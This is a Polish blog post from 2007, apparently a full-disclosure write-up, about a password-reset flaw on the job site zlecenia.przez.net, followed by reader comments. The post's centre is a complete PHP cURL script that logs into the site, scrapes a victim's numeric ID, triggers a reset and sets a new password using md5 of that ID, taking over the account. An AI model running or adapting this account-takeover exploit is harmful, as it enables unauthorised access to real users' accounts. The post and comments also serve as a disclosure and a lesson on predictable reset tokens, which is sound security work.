Przejęcie konta na zlecenia.przez.net 2007-10-27

Historia tak naprawdę z przypadku. Potrzebowałem dodać nową funkcjonalność do jednego z serwisów, które tworzę. Chodziło o przypomnienie / odzyskanie hasła przez użytkownika, które zazwyczaj wysyłane jest na podany przy rejestracji adres e-mail. Jak wiemy, dobry / leniwy / sprytny (niepotrzebne skreślić) programista nigdy nie wynajduje koło od nowa i zanim zacznie coś pisać sprawdzi jak to działa u konkurencji.

Akurat ostatnio korzystałem z tej funkcjonalności na wymienionym w tytule serwisie i postanowiłem sprawdzić jak to tam działa. Na e-mail dostałem link umożliwiający zmianę hasła, którego końcówka wyglądała bardzo znajomo – ciąg 32 liczbowo-literowy wygenerowany najprawdopodobniej przez md5(). Pierwsza myśl jaka mi przeszła przez głowę czy ten kod generowany jest na podstawie identyfikatora użytkownika? md5(‘moj_login’) nie pasowało. W serwisie jest prawie 11000 zarejestrowanych użytkowników toteż postanowiłem sprawdzić czy nie jest to numer użytkownika. Prosta pętla przedstawiona niżej pozwoliła mi na sprawdzenie tej możliwości.

Moje podejrzenia były właściwe. Numer został znaleziony. Na tym etapie moje dociekania zakończyłem i zgłosiłem sprawę serwisowi.

Zauważyłem, że przypomnienie hasła zawiera błąd, który
może zostać wykorzystany przez osoby trzecie. Mianowicie generują
Państwo md5 na podstawie numeru użytkownika.

Odpowiedź Pana Karola K. z serwisu zlecenia.przez.net:

Witam,
Proszę być spokojnym. System jest bezpieczny.
Nie możemy podać szczegółów, ale wbrew pozorom nie jest tak łatwy do
obejścia jak Pan sugeruje.

Co tu dużo mówić.. podziałało to na mnie jak płachta na byka. Postanowiłem rozpracować dokładnie ich system. Nie trwało to długo bo te „tajne” szczegóły to dodanie zabezpieczenia umożliwiające zmianę hasła wyłącznie po zgłoszeniu zgubienia hasła. No po prostu WOW. Wbrew zapewnieniom proszę się jednak bać o konta.

Jakie informacje potrzebne są nam do przejęcia konta użytkownika? Teoretycznie identyfikator liczbowy oraz e-mail użytkownika, który w tym serwisie zdobyć jest niezmiernie prosto (niektóre osoby podają go przy ogłoszeniach, a do innych wystarczy napisać i poprosić by nam odpisały na e-maila). Zdobycie identyfikatora było trochę trudniejsze ponieważ programiści ze zlecenia.przez.net bardzo się starali go ukryć, ale zapomnieli o jednym miejscu – wysyłka e-maila do użytkownika. Ułatwia nam to trochę pracę (chociaż i bez tego można byłoby się włamać, ale wymagałoby to znacznie więcej odwołań do ich systemu).

Poniżej przedstawiam skrypt PHP, który automatyzuje nam całe przejęcie konta. Wymagane jest utworzenie sobie konta na serwisie z uwagi na pobieranie identyfikatora użytkownika, który dostępny jest wyłącznie dla zalogowanych użytkowników.

<?php

ini_set('display_errors', 1);
ini_set('error_reporting', E_ALL | E_STRICT);

// nasze konto
$sAccountLogin = 'login';
$sAccountPassword = 'haslo';
// konto do przejecia
$sTargetLogin = 'cel';
$sTargetEmail = 'nasz@cel.pl';
// nowe haslo dla przejetego konta
$sNewPassword = 'noweHaselko';

$sCookieFileName = 'cookie.txt';
$sURLLogin = 'http://www.zlecenia.przez.net/';
$sURLMail = 'http://www.zlecenia.przez.net/mail,%s';
$sURLRemindPassword = 'http://www.zlecenia.przez.net/zapomniane-haslo,2';
$sURLChangePassword = 'http://zlecenia.przez.net/';

// logowanie
$rC = curl_init();
curl_setopt($rC, CURLOPT_URL, $sURLLogin);
curl_setopt($rC, CURLOPT_COOKIEJAR, $sCookieFileName);
curl_setopt($rC, CURLOPT_COOKIEFILE, $sCookieFileName);
curl_setopt($rC, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($rC, CURLOPT_POST, 1);
curl_setopt($rC, CURLOPT_POSTFIELDS, http_build_query(array(
	'login' => $sAccountLogin,
	'pass' => $sAccountPassword
	)));
$sResult = curl_exec($rC);

if(!preg_match('/Abonament:/', $sResult)) {
	throw new Exception('Bad login or password.');
}

// pobranie identyfikatora uzytkownika
$rC = curl_init();
curl_setopt($rC, CURLOPT_URL, sprintf($sURLMail, $sTargetLogin));
curl_setopt($rC, CURLOPT_COOKIEJAR, $sCookieFileName);
curl_setopt($rC, CURLOPT_COOKIEFILE, $sCookieFileName);
curl_setopt($rC, CURLOPT_RETURNTRANSFER, 1);
$sResult = curl_exec($rC);

if(!preg_match('/name="id" value="([0-9]+)"/', $sResult, $aData)) {
	throw new Exception('User id not found.');
} else {
	$iUserId = $aData[1];
}

// wyslanie informacji, ze zgubilismy haslo
$rC = curl_init();
curl_setopt($rC, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($rC, CURLOPT_URL, $sURLRemindPassword);
curl_setopt($rC, CURLOPT_POSTFIELDS, http_build_query(array(
	'lost_pass_email' => $sTargetEmail
	)));
$sResult = curl_exec($rC);

if(preg_match('/Niestety, ale nie znaleziono takiego adresu emial w bazie danych./', $sResult)) {
	throw new Exception('E-mail not found in database.');
}

// zmiana hasla
$rC = curl_init();
curl_setopt($rC, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($rC, CURLOPT_URL, $sURLChangePassword);
curl_setopt($rC, CURLOPT_POSTFIELDS, http_build_query(array(
	'newpwd1' => $sNewPassword,
	'newpwd2' => $sNewPassword,
	'kod' => md5($iUserId),
	't' => 'pass',
	'type' => 'change'
	)));
curl_exec($rC);

Md5 należy używać z rozwagą.

Bezpieczeństwo, bezpieczeństwo, hack, hacking, internet, luki, sieci, strony, zabezpieczenia, artykuł, blog PHP, bezpieczeństwo, hack, hacking, internet, luki, sieci, strony, zabezpieczenia, artykuł, blog Techblog, bezpieczeństwo, hack, hacking, internet, luki, sieci, strony, zabezpieczenia, artykuł, blog

Słowa kluczowe: Bezpieczeństwo, PHP, Techblog, bezpieczeństwo, hack, hacking, internet, luki, sieci, strony, zabezpieczenia, artykuł, blog

« Ubuntu 7.10

OPT (Open Power Template) »

psz

2007-10-28 00:04

Widzę, że moda na full disclosure dotarła również na Joggera. Liczymy dni do załatania dziury ;)

Eluś

2007-10-28 00:46

A wystarczyłoby hashować identyfikator liczbowy połączony (ze znanym im tylko) ciągiem znaków...

Źle postąpili że zlekceważyli Twoje ostrzeżenie. Ale mimo wszystko mogłeś przed wysłaniem tego wpisu spróbować jeszcze raz im to wytłumaczyć - dając więcej argumentów (choćby te co zamieściłeś tutaj).

Nie chcę Cię straszyć, ale czytałem o podobnych przypadkach które skończyły się w sądzie.

marcin

2007-10-28 01:32

I dobrze, że tu dał. Jakbym tak samo został olany przez admina to bym zrobił to samo.

Gilb

2007-10-28 01:39

jesli ten news komus pomoze dokonac przestepstwa (przejecie konta ktore jest cos warte chociazby) to automatycznie jestes wspolwinny
w sumie to sie moze i wykrecisz
ale latania po sadach i zabawy to bedziesz mial tyle, ze szybko nauczysz sie ze z ta machina lepiej nic nie miec wspolnego

2007-10-28 07:48

Życie jest pełne nieoczekiwanych zwrotów akcji ;) Nie uważam, że sądów powinno się unikać, a wręcz odwrotnie powinniśmy dążyć do tego by działały sprawniej i przyjaźniej dla obywateli.

pawkow

2007-10-28 08:36

Ciekawie, ciekawie, zlecenia.przez.net - taki dobry, popularny serwis ;)

Michał "Bełdzio" Ław

2007-10-28 12:07

Witaj w klubie, taki sam kit z bezpieczeństwem ich serwisu pisali do mnie jak ich poinformowałem o http://www.beldzio.com/poszerzanie-portfolio.freez :)

Kolczasta

2007-10-28 12:16

Next on the deck... mojego maila też delikatnie to ujmując "uspokoili, iż nad wszystkim panują" .. ale przynajmniej po tym mailu "zablokowali" http://www.zlecenia.przez.net/zapomniane-haslo [podkreślam "zablokowali" ]

Mam nadzieje, że Wszyscy zdają sobie sprawę z konsekwencji prawnych faktu tak niskiego poziomu bezpieczeństwa danych użytkowników tego serwisu i faktu iż każdy z nich może sądownie domagać sie wyjaśnienia kwestii dostępu do swoich danych przez osoby 3-cie.

2007-10-28 12:21

Jedno można im przyznać, że reagują szybko ;)

D4rky

2007-10-28 16:34

w takich wypadkach wlamujesz sie na konto admina i zostawiasz mu informacje jak to zrobiles. publiczne udostepnianie exploita jest zue :P

bauer

2007-10-28 17:03

Fakt, mogłeś im to najpierw wysłać. Nie mniej, gratuluję pomysłu.

ZPN

2007-10-28 17:11

Faktycznie, popełniliśmy błąd. Niemniej jednak natychmiast po otrzymaniu informacji od autora bloga w postaci linka do tej strony (28.10.2007 około godz. 11:00) mechanizm automatycznej zmiany hasła z zastosowaniem tej metody został zablokowany. W chwili obecnej zmiana hasła jest możliwa jedynie poprzez kontakt z administratorem. Tak więc nie ma możliwości przejęcia cudzego konta w serwisie.

D4rky

2007-10-28 17:12

ZPN - wszystko byloby dobrze, gdybyscie zrobili to od razu, bez chelpienia sie, ze wasz system jest tak wspanaile zabezpieczony (mimo iz nie jest), i ze nie ma zadnej luki (chociaz byla)

2007-10-28 17:22

@D4rky : Nie włamuje się na czyjeś konto (a przynajmniej się do tego publicznie nie przyznam :P) bo tutaj już mi ktoś może coś zarzucić ;) Testowałem na swoim oraz znajomego, który mi na to zezwolił.

Oczywiście wiele osób najpierw uważa, że najpierw należy zgłosić błąd serwisowi, a dopiero potem upublicznić metodę jaką można ten błąd wykorzystać, ale postanowiłem w tym przypadku postąpić inaczej. Tak jak zauważył @psz w pierwszy poście zwie się to "Full disclosure". Więcej można poczytać na wikipedii :

http://pl.wikipedia.org/wiki/Full_disclosure

psz

2007-10-28 19:03

@ZPN: Zablokowanie to nie jest naprawa. W dalszym ciągu liczę dni do naprawienia tej dziury i udostępnienia bezpiecznego odzyskiwania konta ;)

marcin

2007-10-28 19:26

Rany, zrobili przypomnienie mejlem teraz. Przecież naprawa tego to 30 sekund, widać, że jakieś niekumate dzieciaki tym adminują.

bezprzesady

2007-10-28 21:43

Ja jako klucz do generowania hasła stosuję kombinację:
FUNKCJA_SKROTU(fragment_obecnego_haslo+data_ostatniego_logowania);

jak użytkownik wygeneruje sobie nowe hasło to klucz już jest nieważny. Tak samo jeśli sobie przypomni sobie jednak hasło i się zaloguje do serwisu - wtedy też oczywiście klucz przestaje być ważny.

Pozdrawiam

wojtek

2007-10-29 22:47

Czyli wystarczyło taki skrypt wrzucić na swoją stronke, odpalić i już mogłeś mieć każde hasło?
Mi chyba tak zabrano hasło bo od 28.10 nie mogę się zalogować

raj

2007-10-30 18:32

W przypadku zapomnienia hasla nowe haslo zawsze musi byc losowo generowane przez system (nie mozna pozwolic userowi na wpisanie wlasnego - moze sobie zmienic potem juz po zalogowaniu) i wysylane wylacznie na adres mailowy znajdujacy sie w bazie. Tym sposobem, nawet jezeli ktos obcy zmieni jakims sposobem userowi haslo, to nowe haslo dostanie wlasciwy user, a nie intruz...

Zyx

2007-11-26 23:52

Dla świętego spokoju nie lekceważę ostrzeżeń o lukach w tym, co tworzę. Nawet jeśli ktoś ma przywidzenia, lepiej to sprawdzić, niż później świecić oczami, że coś się stało.

Co do generowania nowych haseł, to stosuję metodę losową wzbogaconą paroma dodatkami. Na pewno nie jest to hash z jakiejś pojedynczej i oczywistej informacji.

Olaf

2008-02-22 19:09

No,no - a z md5 generowanym z daty rejestracji też sobie poradzisz?

gigi_d_agostino

2008-03-29 17:28

hmm...przy dacie można spróbować określić kiedy konto zostało założone i brutal forcem przejechać. Jeśli nie mają limitu na zmianę hasła pewnie dałoby radę.

swider

2008-04-12 10:44

ja stosuje takie cus:
$klucz=md5(uniqid(time()));

;)

pyro

2008-06-26 10:48

Cos zła obsluga bledow w tym explocie brak catch i try :P

2008-06-26 10:50

@pyro: może jeszcze kawę ma parzyć ? ;)

ciekawa

2008-08-11 17:22

jakie są konsekwencje prawne za wlamywanie sie na cudze konto mailowe. Jestem w stanie udowodnic, ze ktos sie wlamywal na moje konto i robil print screeny maili. Chce to zglosic na policje. Czy ma sens?

bizzit

2009-03-14 19:44

He he, dobre! znalazlem ten art w zwiazku z ostatnim banem od Google jaki dostal serwis zlecenia.przez.net, ale widze ze nie tylko tego typu rzeczy zle swiadcza o zlecenia.przez.net

kod nie jest duzy ale za to inicjatywa sie liczy - bravo :)

Podpis:
Url:
Treść: